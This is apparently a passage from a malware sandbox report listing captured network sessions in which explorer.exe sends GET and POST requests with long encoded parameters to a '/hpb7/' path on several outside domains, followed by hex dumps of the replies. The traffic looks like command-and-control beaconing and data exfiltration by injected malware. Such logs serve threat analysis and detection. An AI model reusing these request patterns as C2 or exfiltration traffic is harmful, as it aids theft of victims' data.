43 5a 64 6f 74 38 78 62 31 6a 4a 51 73 79 48 74 52 55 66 72 79 55 6c 59 4d 46 48 46 61 56 31 61 46 4c 5a 49 48 37 54 38 79 4a 4e 74 43 6f 4e 52 52 56 52 28 32 5a 6c 45 31 43 50 45 6d 77 37 51 38 48 58 63 58 56 2d 49 71 48 6d 4d 51 4f 53 34 68 65 58 75 50 39 51 34 44 77 4f 6e 53 41 4d 52 36 38 49 73 77 63 42 57 73 38 69 4f 34 6d 67 6e 6f 45 47 28 47 42 52 62 51 75 32 4b 51 6b 55 5a 4a 53 37 4e 56 31 4a 36 73 34 73 6a 73 53 4b 69 56 43 34 74 55 78 77 6a 6c 73 57 42 4c 54 6e 6e 44 63 31 32 55 32 6d 69 67 6b 65 32 38 6f 79 4e 6b 71 65 68 4b 4c 37 77 4e 37 46 66 37 70 75 58 6f 44 6d 30 48 28 51 6c 73 64 46 31 33 50 71 76 47 59 39 36 56 6f 64 4a 36 36 46 57 46 47 73 47 43 63 36 76 61 43 69 7e 6f 31 35 53 38 52 42 62 54 79 2d 48 77 75 66 31 43 5a 37 39 70 4c 4d 41 46 67 38 45 38 38 78 36 57 78 77 53 33 4f 48 62 53 30 36 42 68 43 37 6b 59 6b 55 48 76 32 51 4e 66 74 74 7a 65 56 59 6c 64 28 41 51 4e 39 4d 76 74 62 67 44 33 32 4e 46 44 35 4e 6d 75 56 6c 7a 4c 7e 49 52 39 4b 51 38 52 49 67 75 59 39 6c 71 4b 36 70 66 45 4c 39 63 55 68 35 4d 6d 58 68 66 7a 34 4f 72 61 53 65 70 32 32 47 75 4c 72 38 44 34 55 75 70 6a 58 6c 31 33 61 36 72 4d 31 52 4a 63 35 68 41 65 73 44 4f 50 62 37 34 37 76 6b 6f 33 7a 4d 33 66 55 6b 75 6b 48 77 56 35 64 48 58 53 75 34 70 31 53 62 33 5f 68 4e 79 39 42 44 42 48 6a 73 61 38 7e 70 72 41 37 73 47 49 70 2d 28 62 53 33 74 43 51 55
                                                          Data Ascii: bcX3Uv=zSsGdga9al9lD_WljaFBc0taLsymEe0bwQeW1ejMVSHef9OxnfXf5NYhvm7AGpjteSvxAyfcQWLSZKCK4Fsh6yWWMEYoCQdpbcLTyCr9aCk0d3nQJn~X5oIcBLg0vfbggYZ13-h-CEEPCgtoDn94C_8v7L2OIBWdZiIgGq3lEzx4kFYmNuTGNvtMCEDR5DGIRLORA3OuWxk_Wm9XkYbPIBMAEoJ0uTiInk7X6NHYBLJVQn25lxUy(rQBkDkiQIRguXqYvtL6jitu10UXxm5FQGwGbaBY4XmsgBGcPDiJ5URJd4sImxeJCSh-~XvY9xVEAtjTUs61(_Knx7v0dKxu5WCBamkZPbA-uehqqTWYQwagLlsIcCd1RtwdriGFL7Cw41dEN1nDYStjDq7PntLxsLZ09vLoiiMqVVD5Xu8JCoCS2GtW85YY50CxVmuo7qhxtGGLL9Smeel2MKm4ltIHeKUJbShYLf7ADETLpE5_w5Q5(JGDPFOEVINTyTO0R-8JwiojB0qCU86FJ_rbOzmeyfGymilRamkjJ4RGtitLcGkO689CxHbTdBKNebKGu0rklWxiwjO61_58dBR-OZA93NxNX9FmjWw9OQJxXecsqoYvLoyICO(m0NGcK8iD(9Bv~WbCoRnS4GDDxVmkLQYhO_P2Bh1KzCrvKeR2K388u2foKz8tlx6M8vDnfrHgKie1HNMzpafkIrMXTO5R3Hbo2sYEE92ltT~7SJk5EqXVax~G~fAdt7m39Bj0oxTiGarkhWBzfk~MkKKLkE5bBzu69l4GXGsigwhV2dBLV9UZy7V_AlHnbgVXf_58SmEd6XB0zeocyxTgPisrVKdQ(d5EP7f3wXoLNqtk6isN5QtHuZa1lCxbAZZO(e3tzE3jBnx0rJbmCCZdot8xb1jJQsyHtRUfryUlYMFHFaV1aFLZIH7T8yJNtCoNRRVR(2ZlE1CPEmw7Q8HXcXV-IqHmMQOS4heXuP9Q4DwOnSAMR68IswcBWs8iO4mgnoEG(GBRbQu2KQkUZJS7NV1J6s4sjsSKiVC4tUxwjlsWBLTnnDc12U2migke28oyNkqehKL7wN7Ff7puXoDm0H(QlsdF13PqvGY96VodJ66FWFGsGCc6vaCi~o15S8RBbTy-Hwuf1CZ79pLMAFg8E88x6WxwS3OHbS06BhC7kYkUHv2QNfttzeVYld(AQN9MvtbgD32NFD5NmuVlzL~IR9KQ8RIguY9lqK6pfEL9cUh5MmXhfz4OraSep22GuLr8D4UupjXl13a6rM1RJc5hAesDOPb747vko3zM3fUkukHwV5dHXSu4p1Sb3_hNy9BDBHjsa8~prA7sGIp-(bS3tCQUYmhbfRIQ2DaAJIkSSKMTRHYh9pZ0gdJYBE7riRCZoRM0KKgL29FlLQJTO0jF5t5AIE4UmaEMUG0wPZIPnt2rZH8fJls4ZPabziP5aCOXmJkFs47IpvBwskAfC_wQA5xVVzk8aDGYrklY1H5aHpoHwuNBZl4t3pCOiss6QsShktxoeXqckAX83yZPfLjPJu~kXpnMtWjVWxDIYLtiYGH5GUSRUAdjgSW9VTVbJbwykmoDezCL(_UhTdZ6NHECYRBPOwfsCjJT(abUeXjKCwJOxAAsTUgQwUrnvl63lnLnLhexoVz6HuSZ07CdpM8VI8cW(tTeAiDdLXYUmRftPR3Q0FHvKe3tJjDDWcrdh4DkTddLmM5V6dbH(aOhQiskpwJ642f1MgV4GxeAqK4-jHUZda6K0qKXCd0J(qlJ5949u5liP_WsHwByjKnQLtSOKCOnTJP9EdRlhi9A4JMtV80Ht36k6ozdi_xU5fNTjQpUBtaMJZm_6mqWmqS_iGYo95ddfqVbFEXWcLd3ZN(LsnzlhWHvdXIwQJaHzOfo76AxgILvPX8WZg2q4wx67dlEm8Zez05bxqB0SI1owtkmgcvi9GVQHVrHWmNKhsvDFz6psLYdVKkHvrL6tUZZfX6T~FDV0UNRCXOqpBuXg128nyNY~XFejoQDN1W7XohFsHFkUez6rEPVUbxgIhPWCcqjkieyTUQfq4nzyw7CKfeD6AJ_akizRK3V81VDw6YAg0NW2djTRnNDLppb14EKHJ~DOwP2V5vmf66Rntas2xIzHFDiG4ERBwvTMXAF8AA6CotI0U9fGwNOtNLTt0RlVy4wTsS2CMxa542ZAwx5JX9BhuKxX60Ze73gTjAICWC1DieKbYCSP9BqFm5HPWTp0I(f4wy1ZVqpBWQoQF09Nn~ubN0UoCKHrLbgFDXiJhOtHhGvSoQCxtb5(jqLZyAwJoUPwc0vYQLdjtBCe-VNM0dzhK3-Wkc7rRjDcz4CIIi2y4nMGgKn3A(u29smoDVFr0V_YSNJ~pLXkF6SmhXXeIqYj4S_HAB6cdLs3U~tfKGyFvg-sKbn4hRO(BwtKxpTba(LaFvxJDEeIYgG3SWGt0MTNSpD~Fvxd20CHYIQkgc5C1~5(0q0JBEMvIRwtRfM~USPUfQGdCvRQPrmYhvZPkJ6Qo3aJ2xj4JN3IWADygIs6KJ4H9hKHtOFm4g1Q9ZHAFPNSXS8Q8gw4nL2K4SIiI0mghPn13An~A3lxlp8SBf02Ts3KlFzRnUsmccR~XIPt2PABUbDK2um(5kwrow1XT0x1r2PwJv9a6nq4P6u4EJrN3YuFVood1z2H68yVJgeVDL0g1SAWsPauVk41UT_gzBbQIQZOpMsGVrPRZu4o-M3d40WpEMJiWevzCu7BTGSKshXvxT0u7v_jUKf345zPL11dhHZSg1mxFout2iPqFOfCybizlkIoMOlM7Y4oy4I8UNJO9jLx4j7rJq5eex9lsile1FNMqr95EI7fQAznFU4KX~jctWGAaQGnAJJvL7hw0H5wDMzpAR1jhisHcAdMMZfTpaOGrJP~aev1dc1gBPGDhafDSF_cDqSKDUlzdgfPp(O65spJ118i63wnNcDzaxz~VxSpSv8BqqUm4Qps9q8bPEGl550Bi8E986HWrNdmjT2Zg9_(mzc2-qreYglV8MTYDUO1IVF0V4Gj9EWGzuDi1x_HWxzdBra8YqrBAFVC8kLy2WWgDO4nDh3enciM-bsmOfzGTRvjqsApgYhxe6sCqGQF9l7oTBfQ98tzQggJ6C01thhIRJnrsoX5etyJ-DSiF8vzv2sxIcm1vrHVfqHZK9dDz92mAXmpUW8lVYubshkskQTRIv1dCpF9cXoKrbKQGufqREWz3X0GURcR_EtMVhPpo0mmtKXYigiKk1zKHLvL0RtZ3xKss5puycoxof4PLlY6d~p08cEKDz8R8CeKwcu6cuuWQmgU453nNq0XlsAKC5Le-ej8pp3s2i5nML5QZz6aLTjOagNBH8cXqYQI8q5kPF9ra7z7nMenerT9SNtmdh287InMjy79LCafDL9vgVQOvu5NYBrGsxwxG501H1fwS7We7iE(gLmMgZbzHS2a-n1vHd9R_Ps1_T-kajo4KBG~M8PjPXx(j7rKmWKMDzCuAMkych8wk(0ZSE4SHXBj2pQ2A7X19uEqSgnYgBINTiSH-gEMjukfOZRiwZuTWjj8sjwsVKD4yxNGaDNJLrFSTHVh7z_KP5bbTirr2~YHg~E9lCIujDeDxP4NCMfOo2KkStInEx1Buy4JISJgScDopH8LrYCtB1SWYxVAN3VhvThuGlR~g531HVWh-0qgqQbFVRqsvJTj3PQdPYyvijmARoVnFYFSCtJd6(xSK7gA64XhcpWdowzQk0wJOal9UOCp6fcV2V-paGxXfMknXjT8KDyHOevacJ50FVKnwrzuamt6rP1qFxk3p0Xu-IinUoOIksrlmwiMr5QXk~3jTp5sLiNIiSVz6I4j-1_R-Ru~SHoisEoZJL3X9(Ng4u0pLcerRF1C9bg~o81tL8mE0D3QhK3HbVhuCeIDtuupiD1A7xZud1ESlqznVuY(lg7QS8UqUMgKSeuqBpb1I4yblfGWLRZSme1CFoH2DO9cpMtXowZge3rF3toqUG9VU9YZLixOja_~mxBCe8of7iq4egj8sYDS6uh3zTUpSgDtGAbwRYe86UQN6XAQOY9cxN
                                                          Mar 21, 2023 08:08:27.865915060 CET486INHTTP/1.1 404 Not Found
                                                          Date: Tue, 21 Mar 2023 07:08:27 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          12192.168.2.349710162.241.24.11080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:08:30.376132011 CET486OUTGET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== HTTP/1.1
                                                          Host: www.bohndigitaltech.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:08:30.562212944 CET487INHTTP/1.1 404 Not Found
                                                          Date: Tue, 21 Mar 2023 07:08:30 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          13192.168.2.34971167.222.24.4880C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:08:35.936125994 CET488OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.rifleroofers.com
                                                          Connection: close
                                                          Content-Length: 188
                                                          Cache-Control: no-cache
                                                          Origin: http://www.rifleroofers.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.rifleroofers.com/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 69 76 6b 49 41 2d 33 38 77 78 69 30 63 45 6e 79 76 46 52 4e 34 4c 4e 78 4e 31 70 6c 34 48 4c 5a 62 32 6f 33 73 6f 4f 43 4b 62 66 65 4b 59 38 35 68 6a 4f 70 5a 47 45 5a 66 4a 49 58 44 34 36 44 34 4f 47 59 4f 54 7e 52 72 45 31 6e 73 53 68 48 38 32 75 42 72 6d 58 4c 34 64 48 49 30 42 39 56 61 64 72 77 4f 54 6c 57 52 46 62 65 79 34 63 64 61 69 30 6b 54 4b 6c 44 63 54 4f 6f 42 5f 66 4b 44 67 6c 45 28 38 6f 65 37 4b 64 52 7e 73 79 71 42 78 52 65 72 47 6d 62 63 64 70 36 66 71 62 58 39 54 49 4c 75 41 29 2e 00 00 00 00 00 00 00 00
                                                          Data Ascii: bcX3Uv=fpdggjRt1rKnivkIA-38wxi0cEnyvFRN4LNxN1pl4HLZb2o3soOCKbfeKY85hjOpZGEZfJIXD46D4OGYOT~RrE1nsShH82uBrmXL4dHI0B9VadrwOTlWRFbey4cdai0kTKlDcTOoB_fKDglE(8oe7KdR~syqBxRerGmbcdp6fqbX9TILuA).
                                                          Mar 21, 2023 08:08:36.190912008 CET489INHTTP/1.1 404 Not Found
                                                          Connection: close
                                                          x-litespeed-tag: 735_HTTP.404
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          content-type: text/html; charset=UTF-8
                                                          link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/"
                                                          x-litespeed-cache-control: no-cache
                                                          transfer-encoding: chunked
                                                          content-encoding: gzip
                                                          vary: Accept-Encoding
                                                          date: Tue, 21 Mar 2023 07:08:36 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 35 32 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 7f 77 db 36 b2 e8 df f2 39 fd 0e 08 fd 36 b6 12 92 22 a9 1f 96 65 cb bd 6d da ee f6 bc 76 d3 d3 b4 77 df de 24 cf 07 22 21 89 09 45 f2 92 94 65 d7 f5 77 7f 67 06 00 09 52 94 44 c9 4e 6f f7 6d f6 de cd 5a 20 30 33 18 0c 66 06 83 01 70 f9 ec 9b d7 af 7e f9 e7 4f df 92 79 b6 08 ae be 38 ba 84 ff 25 9e 9f 8c b5 20 4b 34 12 d0 70 36 d6 58 68 fc fa 46 3b 6a c5 09 9b fa b7 63 2d 9a 8d c8 3c cb e2 74 d4 e9 44 b3 d8 5c b0 4e 98 1e 6b 04 01 30 ea c1 ff 2e 58 46 89 3b a7 49 ca b2 b1 f6 eb 2f df 19 43 2d 2f 0f e9 82 8d b5 1b 9f ad e2 28 c9 34 e2 46 61 c6 c2 6c ac ad 7c 2f 9b 8f 3d 76 e3 bb cc c0 1f 3a f1 43 3f f3 69 60 a4 2e 0d d8 d8 46 28 81 1f 7e 24 09 0b c6 5a 9c 44 53 3f 60 1a 99 27 6c 3a d6 24 59 b3 45 3c 33 a3 64 d6 b9 9d 86 1d 1b 1b 7d 71 74 99 f9 59 c0 ae 7e a2 33 46 c2 28 23 d3 68 19 7a e4 f9 f1 d0 b1 ed 0b f2 b3 3f 0d 18 f9 39 8a a6 2c 49 2f 3b bc ee d1 51 ab 75 f9 cc 30 c8 57 41 40 fc 90 bc 0e 19 79 f3 ed 6b d2 33 1d f3 9c 18 84 fa 51 ca 22 d3 8d 16 c4 30 ae a0 32 76 9c 77 30 89 26 51 96 2a dd 0b 23 3f f4 d8 ad 46 3a d5 aa 33 16 b2 84 66 51 a2 d4 ae a0 3c fd ea fb d7 6f be 7d dd 16 b8 25 90 d4 4d fc 38 23 d9 5d cc c6 1a 8d e3 c0 77 69 e6 47 61 27 f0 5e 7e 48 a3 50 23 6e 40 d3 74 ac 71 52 8d d4 9d b3 05 d5 80 80 d6 bd f6 1f c8 fa db 4c 1b 09 d6 bd eb bc eb f0 2a c0 3e 4d d7 fe 63 96 d0 78 ae 8d de de 6b ff 01 48 b4 91 f6 75 c2 a8 e7 26 cb c5 e4 07 3f cd a0 8e ef 95 00 24 c0 ca 84 73 12 78 f3 ae 33 8f 27 67 ef 3a c7 93 bc 65 c0 5b fa 19 5b 00 90 6f 03 b6 60 61 56 42 03 e5 df 67 6c d1 08 c1 31 00 14 b5 e3 28 f5 81 05 da c8 d6 35 c0 a0 8d 0a e2 ff c1 26 20 00 8d 80 6a ba 06 23 a9 8d b4 bf 45 0b 68 e2 31 ce 6e 04 ae fd 10 45 1f fd 70 46 a6 51 42 28 09 d9 8a 40 9f 75 fc 97 24 2c a6 7e a2 13 fc 06 e5 24 61 8b c8 63 c1 97 e4 1f ec e4 86 91 59 94 91 bb 68 49 dc e8 86 25 cc 33 c9 ab 68 b1 60 89 eb d3 00 1a 25 2c f5 3d 16 82 e8 93 94 25 30 23 4c f2 4b 14 93 ff 5e d2 c0 cf ee 10 0b 60 a7 19 a1 21 a1 d3 69 94 78 74 12 30 12 27 be cb 9e 69 ba b6 4c 82 1d c3 a2 3d e8 5a c8 6e 39 e3 54 11 d8 38 82 39 9b 1f f4 82 a7 7b 8d 94 10 85 1c 90 ae 15 e3 e5 3c 6e bc 38 e8 62 d4 fe 1e 65 e4 3b 98 e4 8d 98 21 5a 3f e8 5a 9c b0 1b 3f 5a a6 28 4f db d9 52 c8 dd c3 7b 95 25 af 93 19 0d fd df 70 2a 36 92 b5 e3 a8 dc 42 08 5e 49 2b 35 ea 86 a6 6b 41 34 8b 54 99 ff 7e 41 67 ec f5 e4 03 73 61 b6 ee 16 8b 55 6c 08 95 fc ae b3 8c 83 88 7a e9 bb 8e 63 39 dd 77 1d cb 7e d7 01 f0 46 18 19 13 ea 7e 9c 25 c0 5f 33 0e 51 57 ec d4 03 a5 5e fe 00 64 ea 5c e9 6b 23 db
                                                          Data Ascii: 5253}w696"emvw$"!EewgRDNomZ 03fp~Oy8% K4p6XhF;jc-<tD\Nk0.XF;I/C-/(4Fal|/=v:C?i`.F(~$ZDS?`'l:$YE<3d}qtY~3F(#hz?9,I/;Qu0WA@yk3Q"02vw0&Q*#?F:3fQ<o}%M8#]wiGa'^~HP#n@tqRL*>McxkHu&?$sx3'g:e[[o`aVBgl1(5& j#Eh1nEpFQB(@u$,~$acYhI%3h`%,=%0#LK^`!ixt0'iL=Zn9T89{<n8be;!Z?Z?Z(OR{%p*6B^I+5kA4T~AgsaUlzc9w~F~%_3QW^d\k#
                                                          Mar 21, 2023 08:08:36.190983057 CET491INData Raw: b2 2c 5d 9b 33 7f 36 cf b4 51 f7 ac fb a0 6b 3e 10 8e 3d 39 00 f2 83 3a 1e fb 4c 7b 21 a1 2b 36 89 b9 a6 d8 cd b1 5c f2 fc f0 07 1a ce 96 48 b6 30 9c ba e6 a7 3f d1 24 7b 3d 6d d8 93 15 9b a4 7e c6 60 72 16 0a b3 59 5b 41 7a d1 0c f5 6c 95 13 6f
                                                          Data Ascii: ,]36Qk>=9:L{!+6\H0?${=m~`rY[Azloz},Ii"5mYm JFUixZ-#$9Kq$mvGqw3N:<^h$jLs/oFk%~etAc5U)c^}E(fT`,
                                                          Mar 21, 2023 08:08:36.191029072 CET492INData Raw: 0a 13 1c 16 32 26 a5 be 5e c8 81 6c b5 4e 73 63 a8 28 b6 ce 8b dc 7f cd 39 9b 0a 9f 14 3d 51 2a dd e4 8e c7 6e 66 4b df 63 69 c7 8d 82 80 a1 43 d5 c9 3f 7f 48 3b d2 37 40 97 6b 46 09 0d 3d 20 86 4a ad ed c2 e2 2a f3 27 3e c6 8f d2 b9 bf c8 dd 09
                                                          Data Ascii: 2&^lNsc(9=Q*nfKciC?H;7@kF= J*'><QOT94gf@Jb2896g,-J;iA*I]L4mUeivz6$9bV[Jm691<VnJFIKT
                                                          Mar 21, 2023 08:08:36.191076994 CET493INData Raw: 67 3d f9 26 df 08 6f eb b1 39 f5 83 e0 17 76 9b 9d 52 b1 1e cc e6 7e aa b3 b6 6e e9 56 5b f7 cd 2c 82 e8 e2 af 3f ff 00 21 1c a1 ca 0e 87 9b 09 b8 6c 3c 1e 97 60 3f e4 1d 73 4f 19 e7 57 b6 ce 29 2e aa 5a fb 22 33 61 8f 8d e9 99 e9 41 e4 64 9c 99
                                                          Data Ascii: g=&o9vR~nV[,?!l<`?sOW).Z"3aAd,kzCEMC~3PvQOkCYwQrq}Megf!,es?Yz[w=[e$mXv:OOai+?s],Chk0z$,t
                                                          Mar 21, 2023 08:08:36.191123009 CET495INData Raw: 81 d3 07 ae 48 f5 0c 1a f8 e2 01 3c 6a 96 10 53 8c 2d a6 f1 62 9e a3 bf 98 dd 2f e8 2d 3f 71 31 72 fa 56 7c 7b f1 00 62 90 50 03 6b a5 37 b3 7b ae 7c e5 47 a4 58 02 c4 1f 4a 92 a7 42 99 dd 2f 8d 95 65 9e 77 cf 6a 48 13 cc 47 16 28 ad 37 f5 ab 76
                                                          Data Ascii: H<jS-b/-?q1rV|{bPk7{|GXJB/ewjHG(7vv=A1Q,(!Wol(`7ush\#y*^`3qPULu-365\3vE6rt4?c]u#eP]j ZzD2IXp.F@
                                                          Mar 21, 2023 08:08:36.191169024 CET496INData Raw: dd 2c 89 56 23 3b f7 8d 2a 2d bb 26 c6 92 8e 0b af 36 f0 2b 4b 8a 6a 85 62 c2 c1 39 fd 98 cc 9d 0a 4c cb 3c 03 9d ae c0 9c 3b 8a 33 66 9b 67 10 80 c1 58 a0 91 32 38 fb 92 71 cb 8d db 02 04 3d 0b 0a db 2b 01 43 6b 25 6c d4 8e 9a 7c f4 b6 d7 95 7e
                                                          Data Ascii: ,V#;*-&6+Kjb9L<;3fgX28q=+Ck%l|~`'oz,l4BOlSllj2m'=a%"l tn58L?BQ{9PU4U7ra_5dD`\~UP?;d#g(!n @=JGA
                                                          Mar 21, 2023 08:08:36.191212893 CET497INData Raw: 95 fe 24 ee 8b ec 85 81 2e a7 ea 69 09 97 73 1f 87 ac 6e 8d cf e3 67 bb 3c b5 4f dc 2f b5 13 fb bb d2 38 8a a5 cd 68 23 cd e0 fa 1a 13 e2 9f 62 7f da 98 d0 84 4f d5 aa 10 e4 b1 29 11 cb 16 21 4b 84 0a 8b 61 96 18 70 9f ef 47 23 8e fc 30 53 8b 85
                                                          Data Ascii: $.isng<O/8h#bO)!KapG#0STN'T2K];$l|ic{W!Q%>Hz;m![v'Ii4/avrC#.v\JDeo'_2:TsAZ
                                                          Mar 21, 2023 08:08:36.191256046 CET499INData Raw: dc 88 01 e4 85 7c cb b7 4d 70 5f 99 88 6d 11 a1 bd 0a f9 ca 01 62 35 be 15 9d 0f 35 cf 3b e0 87 d5 62 0a b7 20 d4 d2 52 6a 2a 8e 7d 8d 08 5c 24 48 bc 28 cb 98 57 9d 1e 8a a6 c4 b3 6e 98 4a 59 5b 78 7d 2d a7 84 f4 9c f1 d2 2a 62 91 e1 5f 1a 41 45
                                                          Data Ascii: |Mp_mb55;b Rj*}\$H(WnJY[x}-*b_AEH'@6\6G->Lb(xD{V:aBouuRv8rO7;r-iC 7_%x$P*+pMJ LEOE,zMw(kN
                                                          Mar 21, 2023 08:08:36.191299915 CET500INData Raw: f8 3b fc 4f 5d cb c1 e8 98 39 6c 38 b5 ea 3e 9e 8d 8e dd 89 d7 67 76 dd c7 e1 e8 f8 bc 47 bb 93 a1 34 27 82 19 ea 8e 20 d9 b8 a5 08 6a 00 97 a4 70 ae d1 73 93 e5 62 92 12 33 4b a8 1f 18 93 24 5a a5 22 15 b3 e6 33 9e 9b e1 21 ba 4d 5f 49 e0 e7 29
                                                          Data Ascii: ;O]9l8>gvG4' jpsb3K$Z"3!M_I)'#|I:dHd1+z,.X4+d{~0Mo_Y}NbN`~r/E"L8Yd]T45I ;W}7#8K..
                                                          Mar 21, 2023 08:08:36.191344023 CET501INData Raw: 53 05 b4 09 80 78 01 1c 60 44 89 0f 7b 5a f2 cc e3 85 c4 0d df 8a 07 fc c4 05 6d f2 23 22 2a be 72 b9 ba c8 e9 5a 83 29 09 2e 9a 48 80 92 ea e2 8b 00 56 8f a2 66 f8 aa 21 33 e4 3e 3e ab 5b 37 9a 1b 6b cb 40 12 a6 ac ca 7e 02 13 4a ca 5e 7e 50 bd
                                                          Data Ascii: Sx`D{Zm#"*rZ).HVf!3>>[7k@~J^~PJoGyy(Q_%lNL_$vHz3d@E=/3<SRA^Es8w(^0NC|4W+)]}dkX3;E2Y.pR
                                                          Mar 21, 2023 08:08:36.303785086 CET503INData Raw: 79 eb 0d 66 0f 05 ad 3a 6a bb 28 d9 07 56 89 14 72 2f 38 66 d5 aa 06 45 73 d4 f0 1e 36 3a f9 b3 03 55 56 cb 63 93 c4 aa 0e 90 dc 6d 1c 91 b9 ef 79 f8 0c 1b 4e b5 3d 46 05 ea 97 7d ce 7c 68 e0 b1 d7 47 8c 4d d1 7c 1f 86 e2 88 ed 24 68 1f 88 c5 10
                                                          Data Ascii: yf:j(Vr/8fEs6:UVcmyN=F}|hGM|$hE9@=g+z1kM!.tF2crc]WHE% &#Q3dxe.,J7Q\'dKD@jrK%|yY;:Q&q,;iTMQS)Fa>Y(!


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          14192.168.2.34971267.222.24.4880C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:08:38.577159882 CET517OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.rifleroofers.com
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.rifleroofers.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.rifleroofers.com/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
